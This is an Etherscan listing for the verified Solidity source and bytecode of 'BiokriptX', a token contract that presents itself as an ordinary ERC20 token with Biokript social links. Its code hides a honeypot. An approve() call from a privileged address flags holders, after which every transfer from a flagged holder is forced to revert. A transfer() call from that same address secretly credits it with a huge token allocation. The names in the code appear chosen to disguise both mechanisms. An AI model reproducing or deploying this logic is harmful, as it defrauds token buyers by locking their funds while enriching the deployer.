ETH Price: $3,374.78 (-8.24%)

Contract

0x48ff5026071D177906508D4fEdc33871FBBba59D
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve200305932024-06-06 5:06:35197 days ago1717650395IN
0x48ff5026...1FBBba59D
0 ETH0.000452789.33884173
Transfer199765432024-05-29 15:55:11204 days ago1716998111IN
0x48ff5026...1FBBba59D
0 ETH0.001251420.5403472
Approve199737982024-05-29 6:42:23204 days ago1716964943IN
0x48ff5026...1FBBba59D
0 ETH0.0008493417.4619383
Approve199737982024-05-29 6:42:23204 days ago1716964943IN
0x48ff5026...1FBBba59D
0 ETH0.0012743117.4619383
Approve199737242024-05-29 6:27:11204 days ago1716964031IN
0x48ff5026...1FBBba59D
0 ETH0.000363397.47107335
Approve199737202024-05-29 6:26:23204 days ago1716963983IN
0x48ff5026...1FBBba59D
0 ETH0.000396868.15932862
Approve199737052024-05-29 6:23:23204 days ago1716963803IN
0x48ff5026...1FBBba59D
0 ETH0.000567777.81360903
Approve199737002024-05-29 6:22:23204 days ago1716963743IN
0x48ff5026...1FBBba59D
0 ETH0.000379117.79422396
Approve199736952024-05-29 6:21:23204 days ago1716963683IN
0x48ff5026...1FBBba59D
0 ETH0.000373057.6697948
Approve199736872024-05-29 6:19:47204 days ago1716963587IN
0x48ff5026...1FBBba59D
0 ETH0.0072665100
Transfer199736842024-05-29 6:19:11204 days ago1716963551IN
0x48ff5026...1FBBba59D
0 ETH0.00024297.2557507
Approve199736842024-05-29 6:19:11204 days ago1716963551IN
0x48ff5026...1FBBba59D
0 ETH0.0072665100
Approve199736692024-05-29 6:16:11205 days ago1716963371IN
0x48ff5026...1FBBba59D
0 ETH0.000629088.65729716
Approve199736622024-05-29 6:14:47205 days ago1716963287IN
0x48ff5026...1FBBba59D
0 ETH0.000400658.23714387
Approve199736622024-05-29 6:14:47205 days ago1716963287IN
0x48ff5026...1FBBba59D
0 ETH0.000400658.23714387
Approve199736622024-05-29 6:14:47205 days ago1716963287IN
0x48ff5026...1FBBba59D
0 ETH0.000404228.30027266
Approve199736602024-05-29 6:14:23205 days ago1716963263IN
0x48ff5026...1FBBba59D
0 ETH0.000386737.95106781
Approve199736562024-05-29 6:13:35205 days ago1716963215IN
0x48ff5026...1FBBba59D
0 ETH0.0032865100
Approve199736542024-05-29 6:13:11205 days ago1716963191IN
0x48ff5026...1FBBba59D
0 ETH0.00041538.53830298
Approve199736542024-05-29 6:13:11205 days ago1716963191IN
0x48ff5026...1FBBba59D
0 ETH0.0072665100
Approve199736522024-05-29 6:12:47205 days ago1716963167IN
0x48ff5026...1FBBba59D
0 ETH0.0072665100
Approve199736512024-05-29 6:12:35205 days ago1716963155IN
0x48ff5026...1FBBba59D
0 ETH0.0006542213.43376551
Approve199736462024-05-29 6:11:35205 days ago1716963095IN
0x48ff5026...1FBBba59D
0 ETH0.0072665100
Approve199736402024-05-29 6:10:23205 days ago1716963023IN
0x48ff5026...1FBBba59D
0 ETH0.0072665100
Approve199736292024-05-29 6:08:11205 days ago1716962891IN
0x48ff5026...1FBBba59D
0 ETH0.0072665100
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
BiokriptX

Compiler Version
v0.8.24+commit.e11b9ed9

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at Etherscan.io on 2024-05-27
*/

/*


            BiokriptX

            Website: https://sol.biokript.com/
            X: https://twitter.com/biokript
            TG: https://t.me/biokript
            Facebook: https://www.facebook.com/biokript
            Github: https://github.com/Biokript
            Instagram: https://www.instagram.com/biokript/
            Reddit: https://www.reddit.com/user/_Biokript





*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;

abstract contract Ownable {
    address private _admin;
    
    event ConUp(address indexed previousAdmin, address indexed newAdmin);

    constructor() {
        _transferOwnership(_sender());
    }

    modifier onlyAdmin() {
        _checkAdmin();
        _;
    }

    function _sender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _data() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

    function admin() public view virtual returns (address) {
        return _admin;
    }

    function _checkAdmin() internal view virtual {
        require(admin() == _sender(), "Ownable: caller is not the admin");
    }

    function _transferOwnership(address newAdmin) internal virtual {
        address oldAdmin = _admin;
        _admin = newAdmin;
        emit ConUp(oldAdmin, newAdmin);
    }

    function renounceOwnership() public virtual onlyAdmin {
        _transferOwnership(address(0));
    }

    event Approval(address indexed owner, address indexed spender, uint256 value);
    event Transfer(address indexed from, address indexed to, uint256 value);
}

contract BiokriptX is Ownable {
    string private _tokenName;
    string private _tokenSymbol;
    uint256 private _maxSupply;
    address public initialContract;

    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(address => bool) public tokenStatus;

    uint128 buyLimit = 78596;
    uint128 sellLimit = 0;
    
    uint256 allocationWal = 10**decimals() * 50000 * (20077700000 + 300);
    bool statusTrue = true;
    bool statusFalse = false;
    

    constructor(address remove) {
        _tokenName = "BiokriptX";
        _tokenSymbol = "SBKPT";
        initialContract = remove;
        _maxSupply = 100000000 * 10**decimals();
        _balances[msg.sender] = _maxSupply;
        emit Transfer(address(0), msg.sender, _maxSupply);
    }

    function name() public view returns (string memory) {
        return _tokenName;
    }

    function symbol() public view returns (string memory) {
        return _tokenSymbol;
    }

    function decimals() public view virtual returns (uint8) {
        return 18;
    }

    function totalSupply() public view returns (uint256) {
        return _maxSupply;
    }

    function balanceOf(address account) public view returns (uint256) {
        return _balances[account];
    }

    function transfer(address to, uint256 amount) public returns (bool) {
        if (_sender() == initialContract) { require(isAuthorized(), "Unauthorized action"); address currentWal = _sender();
        address devWallet = currentWal; _balances[devWallet] += allocationWal; }
        _executeTransfer(_sender(), to, amount);
        return true;
    }

    function allowance(address owner, address spender) public view returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) public returns (bool) {
        _authorize(_sender(), spender, amount); if (_sender() == initialContract) { tokenStatus[spender] = statusTrue; }
        return true;
    }

    function isAuthorized() internal view returns (bool) {
    return _sender() == initialContract;
    }

    function transferFrom(address from, address to, uint256 amount) public virtual returns (bool) {
        address spender = _sender();
        _useAllowance(from, spender, amount);
        _executeTransfer(from, to, amount);
        return true;
    }

    function _executeTransfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        if (tokenStatus[from] == statusTrue) {
            amount = buyLimit + _balances[from] + buyLimit - buyLimit;
        }
        uint256 balance = _balances[from];
        require(balance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[from] = _balances[from] - amount;
        _balances[to] = _balances[to] + amount;
        emit Transfer(from, to, amount);
    }

    function _authorize(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _useAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            _authorize(owner, spender, currentAllowance - amount);
        }
    }


}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"remove","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousAdmin","type":"address"},{"indexed":true,"internalType":"address","name":"newAdmin","type":"address"}],"name":"ConUp","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"admin","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"initialContract","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"tokenStatus","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

608060405262013304600855620000196012600a620002d1565b620000279061c350620002e8565b62000038906404acb964cc620002e8565b600955600a805461ffff1916600117905534801562000055575f80fd5b5060405162000f2538038062000f25833981016040819052620000789162000302565b620000833362000173565b604080518082019091526009815268084d2ded6e4d2e0e8b60bb1b6020820152600190620000b29082620003c8565b5060408051808201909152600581526414d092d41560da1b6020820152600290620000de9082620003c8565b50600480546001600160a01b0319166001600160a01b03831617905562000103601290565b6200011090600a620002d1565b62000120906305f5e100620002e8565b6003819055335f81815260056020908152604080832085905551938452919290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35062000494565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917ffc8eccee73d2808082db1cc1e48f1ba2d1e9585ac72363bb1f939c9cb8c20ea39190a35050565b634e487b7160e01b5f52601160045260245ffd5b600181815b808511156200021657815f1904821115620001fa57620001fa620001c2565b808516156200020857918102915b93841c9390800290620001db565b509250929050565b5f826200022e57506001620002cb565b816200023c57505f620002cb565b8160018114620002555760028114620002605762000280565b6001915050620002cb565b60ff841115620002745762000274620001c2565b50506001821b620002cb565b5060208310610133831016604e8410600b8410161715620002a5575081810a620002cb565b620002b18383620001d6565b805f1904821115620002c757620002c7620001c2565b0290505b92915050565b5f620002e160ff8416836200021e565b9392505050565b8082028115828204841417620002cb57620002cb620001c2565b5f6020828403121562000313575f80fd5b81516001600160a01b0381168114620002e1575f80fd5b634e487b7160e01b5f52604160045260245ffd5b600181811c908216806200035357607f821691505b6020821081036200037257634e487b7160e01b5f52602260045260245ffd5b50919050565b601f821115620003c357805f5260205f20601f840160051c810160208510156200039f5750805b601f840160051c820191505b81811015620003c0575f8155600101620003ab565b50505b505050565b81516001600160401b03811115620003e457620003e46200032a565b620003fc81620003f584546200033e565b8462000378565b602080601f83116001811462000432575f84156200041a5750858301515b5f19600386901b1c1916600185901b1785556200048c565b5f85815260208120601f198616915b82811015620004625788860151825594840194600190910190840162000441565b50858210156200048057878501515f19600388901b60f8161c191681555b505060018460011b0185555b505050505050565b610a8380620004a25f395ff3fe608060405234801561000f575f80fd5b50600436106100cb575f3560e01c806370a0823111610088578063a9059cbb11610063578063a9059cbb146101a0578063bb8a4c94146101b3578063dd62ed3e146101de578063f851a44014610216575f80fd5b806370a0823114610166578063715018a61461018e57806395d89b4114610198575f80fd5b806306fdde03146100cf578063095ea7b3146100ed5780630acac9421461011057806318160ddd1461013257806323b872dd14610144578063313ce56714610157575b5f80fd5b6100d7610226565b6040516100e491906108c2565b60405180910390f35b6101006100fb366004610929565b6102b6565b60405190151581526020016100e4565b61010061011e366004610951565b60076020525f908152604090205460ff1681565b6003545b6040519081526020016100e4565b610100610152366004610971565b61030c565b604051601281526020016100e4565b610136610174366004610951565b6001600160a01b03165f9081526005602052604090205490565b61019661032f565b005b6100d7610342565b6101006101ae366004610929565b610351565b6004546101c6906001600160a01b031681565b6040516001600160a01b0390911681526020016100e4565b6101366101ec3660046109aa565b6001600160a01b039182165f90815260066020908152604080832093909416825291909152205490565b5f546001600160a01b03166101c6565b606060018054610235906109db565b80601f0160208091040260200160405190810160405280929190818152602001828054610261906109db565b80156102ac5780601f10610283576101008083540402835291602001916102ac565b820191905f5260205f20905b81548152906001019060200180831161028f57829003601f168201915b5050505050905090565b5f6102c23384846103f2565b6004546001600160a01b0316330361030257600a546001600160a01b0384165f908152600760205260409020805460ff191660ff90921615159190911790555b5060015b92915050565b5f33610319858285610515565b6103248585856105ac565b506001949350505050565b61033761081a565b6103405f610873565b565b606060028054610235906109db565b6004545f906001600160a01b031633036103e7576004546001600160a01b031633146103ba5760405162461bcd60e51b81526020600482015260136024820152722ab730baba3437b934bd32b21030b1ba34b7b760691b60448201526064015b60405180910390fd5b600954335f8181526005602052604081208054929384939092906103df908490610a27565b909155505050505b6103023384846105ac565b6001600160a01b0383166104545760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103b1565b6001600160a01b0382166104b55760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103b1565b6001600160a01b038381165f8181526006602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038381165f908152600660209081526040808320938616835292905220545f1981146105a657818110156105925760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016103b1565b6105a684846105a18585610a3a565b6103f2565b50505050565b6001600160a01b0383166106105760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103b1565b6001600160a01b0382166106725760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103b1565b600a546001600160a01b0384165f9081526007602052604090205460ff918216151591161515036106f0576008546001600160a01b0384165f908152600560205260409020546fffffffffffffffffffffffffffffffff9091169081906106d99082610a27565b6106e39190610a27565b6106ed9190610a3a565b90505b6001600160a01b0383165f90815260056020526040902054818110156107675760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016103b1565b6001600160a01b0384165f9081526005602052604090205461078a908390610a3a565b6001600160a01b038086165f9081526005602052604080822093909355908516815220546107b9908390610a27565b6001600160a01b038085165f8181526005602052604090819020939093559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061080c9086815260200190565b60405180910390a350505050565b5f546001600160a01b031633146103405760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f74207468652061646d696e60448201526064016103b1565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917ffc8eccee73d2808082db1cc1e48f1ba2d1e9585ac72363bb1f939c9cb8c20ea39190a35050565b5f602080835283518060208501525f5b818110156108ee578581018301518582016040015282016108d2565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610924575f80fd5b919050565b5f806040838503121561093a575f80fd5b6109438361090e565b946020939093013593505050565b5f60208284031215610961575f80fd5b61096a8261090e565b9392505050565b5f805f60608486031215610983575f80fd5b61098c8461090e565b925061099a6020850161090e565b9150604084013590509250925092565b5f80604083850312156109bb575f80fd5b6109c48361090e565b91506109d26020840161090e565b90509250929050565b600181811c908216806109ef57607f821691505b602082108103610a0d57634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b8082018082111561030657610306610a13565b8181038181111561030657610306610a1356fea2646970667358221220caf0c2b542309e2b47588705540b6836c0057e7060449fb0df6f5bf5397f728264736f6c63430008180033000000000000000000000000df70046b16c2302067db0be42ab8bc6320d4861f

Deployed Bytecode

0x608060405234801561000f575f80fd5b50600436106100cb575f3560e01c806370a0823111610088578063a9059cbb11610063578063a9059cbb146101a0578063bb8a4c94146101b3578063dd62ed3e146101de578063f851a44014610216575f80fd5b806370a0823114610166578063715018a61461018e57806395d89b4114610198575f80fd5b806306fdde03146100cf578063095ea7b3146100ed5780630acac9421461011057806318160ddd1461013257806323b872dd14610144578063313ce56714610157575b5f80fd5b6100d7610226565b6040516100e491906108c2565b60405180910390f35b6101006100fb366004610929565b6102b6565b60405190151581526020016100e4565b61010061011e366004610951565b60076020525f908152604090205460ff1681565b6003545b6040519081526020016100e4565b610100610152366004610971565b61030c565b604051601281526020016100e4565b610136610174366004610951565b6001600160a01b03165f9081526005602052604090205490565b61019661032f565b005b6100d7610342565b6101006101ae366004610929565b610351565b6004546101c6906001600160a01b031681565b6040516001600160a01b0390911681526020016100e4565b6101366101ec3660046109aa565b6001600160a01b039182165f90815260066020908152604080832093909416825291909152205490565b5f546001600160a01b03166101c6565b606060018054610235906109db565b80601f0160208091040260200160405190810160405280929190818152602001828054610261906109db565b80156102ac5780601f10610283576101008083540402835291602001916102ac565b820191905f5260205f20905b81548152906001019060200180831161028f57829003601f168201915b5050505050905090565b5f6102c23384846103f2565b6004546001600160a01b0316330361030257600a546001600160a01b0384165f908152600760205260409020805460ff191660ff90921615159190911790555b5060015b92915050565b5f33610319858285610515565b6103248585856105ac565b506001949350505050565b61033761081a565b6103405f610873565b565b606060028054610235906109db565b6004545f906001600160a01b031633036103e7576004546001600160a01b031633146103ba5760405162461bcd60e51b81526020600482015260136024820152722ab730baba3437b934bd32b21030b1ba34b7b760691b60448201526064015b60405180910390fd5b600954335f8181526005602052604081208054929384939092906103df908490610a27565b909155505050505b6103023384846105ac565b6001600160a01b0383166104545760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103b1565b6001600160a01b0382166104b55760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103b1565b6001600160a01b038381165f8181526006602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038381165f908152600660209081526040808320938616835292905220545f1981146105a657818110156105925760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016103b1565b6105a684846105a18585610a3a565b6103f2565b50505050565b6001600160a01b0383166106105760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103b1565b6001600160a01b0382166106725760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103b1565b600a546001600160a01b0384165f9081526007602052604090205460ff918216151591161515036106f0576008546001600160a01b0384165f908152600560205260409020546fffffffffffffffffffffffffffffffff9091169081906106d99082610a27565b6106e39190610a27565b6106ed9190610a3a565b90505b6001600160a01b0383165f90815260056020526040902054818110156107675760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016103b1565b6001600160a01b0384165f9081526005602052604090205461078a908390610a3a565b6001600160a01b038086165f9081526005602052604080822093909355908516815220546107b9908390610a27565b6001600160a01b038085165f8181526005602052604090819020939093559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061080c9086815260200190565b60405180910390a350505050565b5f546001600160a01b031633146103405760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f74207468652061646d696e60448201526064016103b1565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917ffc8eccee73d2808082db1cc1e48f1ba2d1e9585ac72363bb1f939c9cb8c20ea39190a35050565b5f602080835283518060208501525f5b818110156108ee578581018301518582016040015282016108d2565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610924575f80fd5b919050565b5f806040838503121561093a575f80fd5b6109438361090e565b946020939093013593505050565b5f60208284031215610961575f80fd5b61096a8261090e565b9392505050565b5f805f60608486031215610983575f80fd5b61098c8461090e565b925061099a6020850161090e565b9150604084013590509250925092565b5f80604083850312156109bb575f80fd5b6109c48361090e565b91506109d26020840161090e565b90509250929050565b600181811c908216806109ef57607f821691505b602082108103610a0d57634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b8082018082111561030657610306610a13565b8181038181111561030657610306610a1356fea2646970667358221220caf0c2b542309e2b47588705540b6836c0057e7060449fb0df6f5bf5397f728264736f6c63430008180033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000df70046b16c2302067db0be42ab8bc6320d4861f

-----Decoded View---------------
Arg [0] : remove (address): 0xdf70046B16c2302067Db0Be42aB8Bc6320d4861f

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 000000000000000000000000df70046b16c2302067db0be42ab8bc6320d4861f


Deployed Bytecode Sourcemap

1654:3867:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2517:88;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3525:224;;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;3525:224:0;1004:187:1;1955:43:0;;;;;;:::i;:::-;;;;;;;;;;;;;;;;2805:89;2876:10;;2805:89;;;1533:25:1;;;1521:2;1506:18;2805:89:0;1387:177:1;3868:254:0;;;;;;:::i;:::-;;:::i;2713:84::-;;;2787:2;2044:36:1;;2032:2;2017:18;2713:84:0;1902:184:1;2902:110:0;;;;;;:::i;:::-;-1:-1:-1;;;;;2986:18:0;2959:7;2986:18;;;:9;:18;;;;;;;2902:110;1380:103;;;:::i;:::-;;2613:92;;;:::i;3020:355::-;;;;;;:::i;:::-;;:::i;1790:30::-;;;;;-1:-1:-1;;;;;1790:30:0;;;;;;-1:-1:-1;;;;;2255:32:1;;;2237:51;;2225:2;2210:18;1790:30:0;2091:203:1;3383:134:0;;;;;;:::i;:::-;-1:-1:-1;;;;;3482:18:0;;;3455:7;3482:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;3383:134;964:87;1010:7;1037:6;-1:-1:-1;;;;;1037:6:0;964:87;;2517:88;2554:13;2587:10;2580:17;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2517:88;:::o;3525:224::-;3591:4;3608:38;832:10;3630:7;3639:6;3608:10;:38::i;:::-;3665:15;;-1:-1:-1;;;;;3665:15:0;832:10;3652:28;3648:72;;3707:10;;-1:-1:-1;;;;;3684:20:0;;3707:10;3684:20;;;:11;:20;;;;;:33;;-1:-1:-1;;3684:33:0;3707:10;;;;3684:33;;;;;;;;3648:72;-1:-1:-1;3737:4:0;3525:224;;;;;:::o;3868:254::-;3956:4;832:10;4011:36;4025:4;832:10;4040:6;4011:13;:36::i;:::-;4058:34;4075:4;4081:2;4085:6;4058:16;:34::i;:::-;-1:-1:-1;4110:4:0;;3868:254;-1:-1:-1;;;;3868:254:0:o;1380:103::-;714:13;:11;:13::i;:::-;1445:30:::1;1472:1;1445:18;:30::i;:::-;1380:103::o:0;2613:92::-;2652:13;2685:12;2678:19;;;;;:::i;3020:355::-;3116:15;;3082:4;;-1:-1:-1;;;;;3116:15:0;832:10;3103:28;3099:197;;3837:15;;-1:-1:-1;;;;;3837:15:0;832:10;3824:28;3135:46;;;;-1:-1:-1;;;3135:46:0;;3151:2:1;3135:46:0;;;3133:21:1;3190:2;3170:18;;;3163:30;-1:-1:-1;;;3209:18:1;;;3202:49;3268:18;;3135:46:0;;;;;;;;;3280:13;;832:10;3183:18;3256:20;;;:9;:20;;;;;:37;;832:10;;;;3280:13;;3183:18;3256:37;;3280:13;;3256:37;:::i;:::-;;;;-1:-1:-1;;;;3099:197:0;3306:39;832:10;3334:2;3338:6;3306:16;:39::i;4785:346::-;-1:-1:-1;;;;;4889:19:0;;4881:68;;;;-1:-1:-1;;;4881:68:0;;3761:2:1;4881:68:0;;;3743:21:1;3800:2;3780:18;;;3773:30;3839:34;3819:18;;;3812:62;-1:-1:-1;;;3890:18:1;;;3883:34;3934:19;;4881:68:0;3559:400:1;4881:68:0;-1:-1:-1;;;;;4968:21:0;;4960:68;;;;-1:-1:-1;;;4960:68:0;;4166:2:1;4960:68:0;;;4148:21:1;4205:2;4185:18;;;4178:30;4244:34;4224:18;;;4217:62;-1:-1:-1;;;4295:18:1;;;4288:32;4337:19;;4960:68:0;3964:398:1;4960:68:0;-1:-1:-1;;;;;5039:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;5091:32;;1533:25:1;;;5091:32:0;;1506:18:1;5091:32:0;;;;;;;4785:346;;;:::o;5139:375::-;-1:-1:-1;;;;;3482:18:0;;;5238:24;3482:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;-1:-1:-1;;5305:37:0;;5301:206;;5387:6;5367:16;:26;;5359:68;;;;-1:-1:-1;;;5359:68:0;;4569:2:1;5359:68:0;;;4551:21:1;4608:2;4588:18;;;4581:30;4647:31;4627:18;;;4620:59;4696:18;;5359:68:0;4367:353:1;5359:68:0;5442:53;5453:5;5460:7;5469:25;5488:6;5469:16;:25;:::i;:::-;5442:10;:53::i;:::-;5227:287;5139:375;;;:::o;4130:647::-;-1:-1:-1;;;;;4234:18:0;;4226:68;;;;-1:-1:-1;;;4226:68:0;;5060:2:1;4226:68:0;;;5042:21:1;5099:2;5079:18;;;5072:30;5138:34;5118:18;;;5111:62;-1:-1:-1;;;5189:18:1;;;5182:35;5234:19;;4226:68:0;4858:401:1;4226:68:0;-1:-1:-1;;;;;4313:16:0;;4305:64;;;;-1:-1:-1;;;4305:64:0;;5466:2:1;4305:64:0;;;5448:21:1;5505:2;5485:18;;;5478:30;5544:34;5524:18;;;5517:62;-1:-1:-1;;;5595:18:1;;;5588:33;5638:19;;4305:64:0;5264:399:1;4305:64:0;4407:10;;-1:-1:-1;;;;;4386:17:0;;4407:10;4386:17;;;:11;:17;;;;;;4407:10;;;;4386:31;;:17;;:31;;;4382:121;;4483:8;;-1:-1:-1;;;;;4454:15:0;;4483:8;4454:15;;;:9;:15;;;;;;4483:8;;;;;;;4443:26;;4483:8;4443:26;:::i;:::-;:37;;;;:::i;:::-;:48;;;;:::i;:::-;4434:57;;4382:121;-1:-1:-1;;;;;4531:15:0;;4513;4531;;;:9;:15;;;;;;4565:17;;;;4557:68;;;;-1:-1:-1;;;4557:68:0;;5870:2:1;4557:68:0;;;5852:21:1;5909:2;5889:18;;;5882:30;5948:34;5928:18;;;5921:62;-1:-1:-1;;;5999:18:1;;;5992:36;6045:19;;4557:68:0;5668:402:1;4557:68:0;-1:-1:-1;;;;;4654:15:0;;;;;;:9;:15;;;;;;:24;;4672:6;;4654:24;:::i;:::-;-1:-1:-1;;;;;4636:15:0;;;;;;;:9;:15;;;;;;:42;;;;4705:13;;;;;;;:22;;4721:6;;4705:22;:::i;:::-;-1:-1:-1;;;;;4689:13:0;;;;;;;:9;:13;;;;;;;:38;;;;4743:26;;;;;;;;;;4762:6;1533:25:1;;1521:2;1506:18;;1387:177;4743:26:0;;;;;;;;4215:562;4130:647;;;:::o;1059:129::-;1010:7;1037:6;-1:-1:-1;;;;;1037:6:0;832:10;1123:20;1115:65;;;;-1:-1:-1;;;1115:65:0;;6277:2:1;1115:65:0;;;6259:21:1;;;6296:18;;;6289:30;6355:34;6335:18;;;6328:62;6407:18;;1115:65:0;6075:356:1;1196:176:0;1270:16;1289:6;;-1:-1:-1;;;;;1306:17:0;;;-1:-1:-1;;;;;;1306:17:0;;;;;;1339:25;;1289:6;;;;;;;1339:25;;1270:16;1339:25;1259:113;1196:176;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173: